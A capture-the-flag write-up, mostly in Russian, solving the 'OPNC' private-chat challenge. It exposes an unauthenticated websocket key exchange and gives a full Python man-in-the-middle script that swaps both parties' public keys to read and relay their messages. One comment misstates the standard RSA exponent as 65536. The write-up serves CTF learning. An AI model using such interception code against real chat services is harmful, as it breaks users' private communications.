# OPNC

## Описание

Новый суперприватный чат, ваша переписка защищена на 100%. Даже, если у нас попросят ключи, мы не сможем вас сдать, потому что они все у вас.

***

New superprivate chat, your privacy is 100% guaranteed, even if we are asked for the keys we will not be able to surrender you because we don’t have those.

opnc.mctf.online

## Подсказки

Вы все еще верите, что приватное общение происходит по выделенному каналу?
***
Do you still believe that private communication takes place through a dedicated channel?

## Решение

При открытии видно страницу чата
![](screenshots/main.png)

сразу лезем в networking и смотрим, как к нам приходят запросы о подлкючении новых пользователей или отправке сообщений

Если пронаблюдать, то видно, как некоторые подключения устанавливают приватный канал для обмена сообщениями

![](screenshots/messaging.png)

идем в исходники страницы и видим, что кто-то оставил нам sourcemap для простоты чтения bundle файла

![](screenshots/sourcemap.png)

находим в исходниках, где объявляется вебсокет и подключается обработчик сообщений

![](screenshots/wsonmessage.png)

![](screenshots/listen.png)

смотрим на исходный код обработчика и понимаем, что это RPC

код процедур, которых хранится в объекте cmds

![](screenshots/rpc.png)

здесь мы видим, что ключи хранятся в объекте keys для каждого клиента
и нет никакой аутентификации пользователей, поэтому любой может представиться
другим пользователем

занесение публичных ключей в словарь происходит в функции end_handshake 

![](screenshots/end_handshake.png)

также стоит заметить, что неправильная дешифровка сообщений по сути игнорируется
выводом ошибки в консоль

поэтому мы можем начать реализовавать mitm атаку

для этого нам надо заменить публичные ключи обоих отправителей, вызовом end_handshake
с нашим публичным ключем

далее, чтоб сообщение все таки доходили надо запомнить изначальные публичные ключи для перешифровки

Начинаем писать нашего снифера

``` python
import asyncio
import websockets
import json
import rsa
import logging
import binascii

# адрес вебсокета
url = "ws://opnc.mctf.online/ws"


# шифротекст переводится в hex строки при передачи, и по сути это переписанные js функции
def encrypt(data, key):
    res = b''
    data = data.encode()
    for i in range(0, len(data), 53):
        res += rsa.encrypt(data[i:i+53], key)
    return binascii.hexlify(res).decode()

def decrypt(data, key):
    res = b''
    data = binascii.unhexlify(data)
    for i in range(0, len(data), 64):
        res += rsa.decrypt(data[i:i+64], key)
    return res.decode()

# длина ключа 512 бит и выставлены стандартная экспонента 65536 
publicKey, private = rsa.newkeys(512)
public = publicKey.save_pkcs1().decode()

# здесь мы будем хранить ключи жертв
keys = {}

async def main():
    # используем библиотеку websockets для работы с вебсокетами на питоне
    async with websockets.connect(url) as websocket:
        # сахар
        def send(*args):
            asyncio.ensure_future(websocket.send(json.dumps(args)))
            
        async for message in websocket:
            try:
                # кусок rpc из js кода
                sender, recipient, cmd, *args = json.loads(message)
                
                if cmd == 'start_handshake':
                    # Если кто-то инициирует рукопожатие, запоминаем его публичный ключ
                    keys[sender] = rsa.PublicKey.load_pkcs1(args[0])
                elif cmd == 'end_handshake':
                    # Когда рукопожатие закончено, запоминаем публичный ключ, которым ответили на рукопожатие
                    keys[sender] = rsa.PublicKey.load_pkcs1(args[0])
                    # и отправляем обоим наш публичный ключ для начала дешифровки сообщений
                    send(recipient, sender, 'end_handshake', public)
                    send(sender, recipient, 'end_handshake', public)
                elif cmd == 'message' and sender in keys and recipient in keys:
                    # Если кто-то отправил сообщение и у нас есть его ключи
                    try:
                        # Мы верим, что до начала обмена сообщениями, мы уже заменили им ключи
                        # Поэтому сразу пытаемся дешифровать их сообщение нашим приватным ключем
                        msg = decrypt(args[0], private)
                        # выводим дешифрованный текст
                        print(msg)
                        # перешифровываем сообщение публичным ключем адресата и отправляем
                        data = encrypt(msg, keys[recipient])
                        send(sender, recipient, 'message', data)
                    except Exception as e:
                        logging.error(e)
                    
            except Exception as e:
                logging.error(e)

loop = asyncio.get_event_loop()
loop.run_until_complete(main())
```

![](screenshots/solve.png)

